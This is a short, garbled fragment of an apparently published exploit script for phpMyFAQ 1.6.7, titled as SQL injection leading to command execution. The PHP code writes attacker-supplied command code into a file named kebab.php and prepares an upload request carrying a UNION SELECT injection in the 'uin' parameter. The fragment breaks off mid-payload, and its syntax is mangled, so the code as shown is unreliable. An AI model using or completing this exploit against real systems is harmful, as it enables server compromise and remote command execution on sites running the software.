phpMyFAQ 1.6.7 - SQL Injection / Command Execution

!/usr/bin/php5-cgi -q " localhost:4001 [email protected] / function doupload$baseurl, $proxy, $cmd $fp = fopen"kebab.php", "w"; if!$fp die"Cannot open file for writing"; $code = "Un1q" . $cmd . ""; fwrite$fp, $code; fclose$fp; $sendvars"aktion" = "save"; $sendvars"uin" = "-1' UNION SELECT...